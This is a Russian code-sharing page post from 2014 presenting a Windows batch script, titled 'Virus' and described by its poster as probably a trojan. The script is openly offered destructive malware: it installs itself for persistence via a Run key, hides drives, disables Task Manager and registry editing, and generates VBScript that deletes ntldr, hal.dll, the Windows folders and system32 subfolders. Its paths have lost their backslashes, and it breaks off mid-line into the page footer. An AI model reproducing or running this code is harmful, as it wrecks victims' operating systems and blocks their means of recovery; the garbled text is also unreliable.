Просмотр кода
Название: Вирус
Описание: Не знаю, что за вирус, но по моему троян! На своем ПК не пробовать!
Добавил:
PSYh
Дата: 23 дек 2014, в 10:30
Комментарии (4)
Описание: Не знаю, что за вирус, но по моему троян! На своем ПК не пробовать!
<?php
@echo This virus created by LIZA
@echo Virus: pcforumhack.ru™ Virus
@echo Autor: LIZA
@echo off
echo Chr(39)>%temp%temp1.vbs
echo Chr(39)>%temp%temp2.vbs
echo on error resume next > %temp%temp.vbs
echo Set S = CreateObject("Wscript.Shell") » %temp%temp.vbs
echo set FSO=createobject("scripting.filesystemobject")»%temp%temp.vbs
reg add HKEY_USERSS-1-5-21-343818398-1417001333-725345543-1003SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v nodesktop /d 1 /freg add HKEY_USERSS-1-5-21-343818398-1417001333-725345543-1003SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%user32dll.bat
reg add "hklmSoftwareMicrosoftWindowsCurrentVersionRun" /v RunExplorer32 /d %SystemRoot%user32dll.bat /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoDrives /t REG_DWORD /d 67108863 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile "C:ntldr",1 » %temp%temp.vbs
reg add "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions" /v "NoSelectDownloadDir" /d 1 /f
reg add "HKLMSOFTWAREMicrosoftInternet ExplorermainFeatureControlFeature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
reg add "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions" /v "NoFindFiles" /d 1 /f
reg add "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions" /v "NoNavButtons" /d 1 /f
echo fso.deletefolder "D:Windows",1 » %temp%temp.vbs
echo fso.deletefolder "I:Windows",1 » %temp%temp.vbs
echo fso.deletefolder "C:Windows",1 » %temp%temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot") » %temp%temp.vbs
echo fso.deletefile sr+"system32hal.dll",1 » %temp%temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot") » %temp%temp.vbs
echo fso.deletefolder sr+"system32dllcache",1 » %temp%temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot") » %temp%temp.vbs
echo fso.deletefolder sr+"system32drives",1 » %temp%temp.vbs
echo s.regwrite "HKEY_CLASSES_ROOTCLSID{645FF040-5081-101B-9F08-00AA002F954E}LocalizedString","forum.whack.ru™"»%temp%temp.vbs
echo s.regwrite "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner","forum.whack.ru™"»%temp%temp.vbs
echo s.regwrite "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization","forum.whack.ru™"»%temp%temp.vbs
echo on error resume next > %temp%temp1.vbs
echo set FSO=createobject("scripting.filesystemobject")»%temp%temp1.vbs
echo do»%temp%temp1.vbs
echo fso.getfile ("A:")»%temp%temp1.vbs
echo loop»%temp%temp1.vbs
echo on error resume next > %temp%temp2.vbs
echo Set S = CreateObject("Wscript.Shell") » %temp%temp2.vbs
echo do»%temp%temp2.vbs
echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True"»%temp%temp2.vbs
echo loop»%temp%temp2.vbs
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v disableregistrytools /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftДобавил:
PSYh Дата: 23 дек 2014, в 10:30
Комментарии (4)